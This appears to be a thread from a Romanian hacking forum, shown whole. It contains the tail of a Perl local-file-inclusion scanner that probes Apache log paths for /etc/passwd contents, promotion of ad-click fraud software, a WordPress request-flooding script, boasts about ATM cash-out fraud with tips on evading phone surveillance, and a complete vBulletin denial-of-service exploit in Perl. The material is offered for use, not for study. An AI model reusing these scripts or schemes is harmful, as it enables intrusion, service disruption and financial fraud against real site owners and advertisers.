'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log', '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log', '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log', '../../../../../../../../../../../../../../../apache/logs/access.log', '../../../../../../../../../../../../../../../apache/logs/error.log', '../../../../../../../../../../../../../../../apache2/logs/error.log', '../../../../../../../../../../../../../../../apache2/logs/access.log', '../../../../../../../../../../../../../../../var/www/logs/access_log', '../../../../../../../../../../../../../../../var/www/logs/access.log', '../../../../../../../../../../../../../../../var/log/apache/access_log', '../../../../../../../../../../../../../../../var/log/apache2/access_log', '../../../../../../../../../../../../../../../var/log/apache/access.log', '../../../../../../../../../../../../../../../var/log/apache2/access.log', '../../../../../../../../../../../../../../../var/www/logs/error_log', '../../../../../../../../../../../../../../../var/www/logs/error.log', '../../../../../../../../../../../../../../../var/log/access_log', '../../../../../../../../../../../../../../../var/log/access.log', '../../../../../../../../../../../../../../../var/log/apache/error_log', '../../../../../../../../../../../../../../../var/log/apache2/error_log', '../../../../../../../../../../../../../../../var/log/apache/error.log', '../../../../../../../../../../../../../../../var/log/apache2/error.log', '../../../../../../../../../../../../../../../var/log/error_log', '../../../../../../../../../../../../../../../var/log/error.log', '../../../../../../../../../../../../../../../var/log/httpd/access_log', '../../../../../../../../../../../../../../../var/log/httpd/error_log', '../../../../../../../../../../../../../../../var/log/httpd/access.log', '../../../../../../../../../../../../../../../var/log/httpd/error.log', '../../../../../../../../../../../../../../../opt/lampp/logs/access_log', '../../../../../../../../../../../../../../../opt/lampp/logs/error_log', '../../../../../../../../../../../../../../../opt/xampp/logs/access_log', '../../../../../../../../../../../../../../../opt/xampp/logs/error_log', '../../../../../../../../../../../../../../../opt/lampp/logs/access.log', '../../../../../../../../../../../../../../../opt/lampp/logs/error.log', '../../../../../../../../../../../../../../../opt/xampp/logs/access.log', '../../../../../../../../../../../../../../../opt/xampp/logs/error.log'); print "\tPAYLOAD LOADED IN PROGRESS...\n\n"; foreach $scan(@vulnerabilities){ $url = $target.$scan; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;} else { $msg = "Not Vulnerable";} print "$scan..........[$msg]\n"; }
-
adica numai merge ?
-
Nu stiu daca mai are cineva postat de asa ceva sau nu ati auzit, dar eu l-am folosit multi ani si inca merge daca ai o lista bunicica de proxyuri merge garantat ( faceam trafic in nesimtire cu asa ceva. daca exista altceva mai bun ata e eu de asta stiu ) Poti seta la 30 40 de vizite doar 1 2 sa dea click pe banerul care plateste , oricum e bun de incercat pt cine se ocupa cu nevoie de trafic Living On The Edge Download: http://clickingagent.com/dl/cademo.msi ======= Key features: * Powerful content analizing features capable to detect protection schemes used by many toplists and advertisers. * Cookie support. * Scripts support. * Custom browser strings. * Custom language strings. * Fully automated process of accessing your banners and clicking them. * You have enough options to customize the program behaviour: define how many clicks it should do, what show/click ratio should be, how many simultaneous connections to use, and more... * Configure the program once and let it start with Windows. It will do all the work in automatic mode. * Autodetect and Autodial Internet Connection feature simplifies your task a great deal. * Password protection. * Remote control. * If you want something more then don't hesitate to contact the author.. ======
-
da cand o sa fac rost de un linux ca am uitat incarcatorul la munte de la laptopul cu linux asa ca daca are cineva un linux la indemna sa faca un mic tutorial pt cine are nevoie. edit: shit asta e in perl, fac tutorialul later:)
-
daca ai linux copiaza ce am scris eu intrun fisier de genu wp.sh si ii dai ./wp.sh si ar trebuii sa mearga. echo " usage $0 --host http://localhost/wordpress/ --requests 1000" asta inseamna ./wp.sh --host http://site.com/wordpress --requests 1000 presupun Am uitat cum se folosea pt windows cu cygwin, dar imi aduc aminte si postez cum. daca stie cineva e binevenit sa scrie
-
Bai nytro scuze ca reinvii acest topic dar ma amuza chestia asta " ne-a declarat sloboz alexandru asta specialist. NU am vazut live ca asa s-a intamplat dar va zic, am o brigada care a facut cu asa ceva BANI in anglia, ca i-a prins e alta poveste. Iar ce zice tovarasu ca trebe multe detalii sa faca asa ceva, in spania in 2007 era bagat un sistem in care puteai scoate BANII de la ORICE bankomat daca aveai access la un cont de CAIXA direct cu SMS. aveai optiune de a trimite banii si te duceai cu codul primit prin sms la bankomat si ridicai banii ( va zic sigur ca de...aia o stiu live ) Dobitocii astia care lucreaza la firme de "securitate" cmon astia sunt administratorii nostrii din zilele noastre in care intra orice copil la iei in site-uri sau mai nu stiu ce ----- Si totusi nu as putea zice 100% sigur ca asa a fost cu aia din anglia, dar chestia cu datele prin sms, sunt probate 100%, asa ca o oarecare chestiune mica de adevarar ar fi. p.s: esti nesimtit dragosh1904 ? nu imi cer scuze ca te fac nesimtit dar esti. adica cine a folosit telefoanele alea ( ca sa nu fie ascultate e nesimtit ? ) am aruncat galeti de telefoane de alea...degeaba va chinuiti voi cu telefonul sa nu fie ascultat, mai e o chestie AMPRENTA VOCALA daca nu ati auzit. ma chinui de 10 ani cel putin sa am un telefon CURAT cum se zice...tin 2 saptamani si dupa....shit happends...so any phone tine maxim 2 saptamani hai 3 depinde de caz la caz pana o sa devina oricum toate telefoanele sunt ascultate asa ca va chinuiti degeaba ( exista cuvinte cheie care oricum le spuneti oricat va chinuiti voi si oups inevitabil, in plus pt o mai buna chestie daca sunteti mai paranoia ca mine, luati telefon pt fiecare persoana in parte si aceea persoana cu tine, automat daca aveti o SINGURA persoana de legatura care nu a schimbat telefonul, gen prietena parinti, puteti sa va schimbati voi numarul pe saptamana ca tot degeaba. doar ca m-a deranjat ca a facut borfasi pe toti care foloseau telefoanele alea. am impresia ca esti mai borfas decat borfasii. edit: am uitat sa precizez ( cand schimbati numarul schimbati si telefonul " sau IMEI-ul " care pot care nu ata e alti bani alta distractie, paranoia costa, dar si freedom "
-
felicitari mi-a placut ceea ce am citit.
-
#!/c:/perl/bin # # VBulletin Denail of Service Exploit by 4.!.5 # # created : !N 7h3 DARKNESS # CODED BY: R3d-D3V!L # # important => Image Verification in (search.php) is NOT Enabled. # It tested on V3.6.3 # #Perl Script use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $user="vb".$rand.$i; $data = "s=" ; $len = length $data; $foo = "POST ".$dir."index.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 /\n\n"; exit(); }; # Exploit By 4.!.5... ######################################################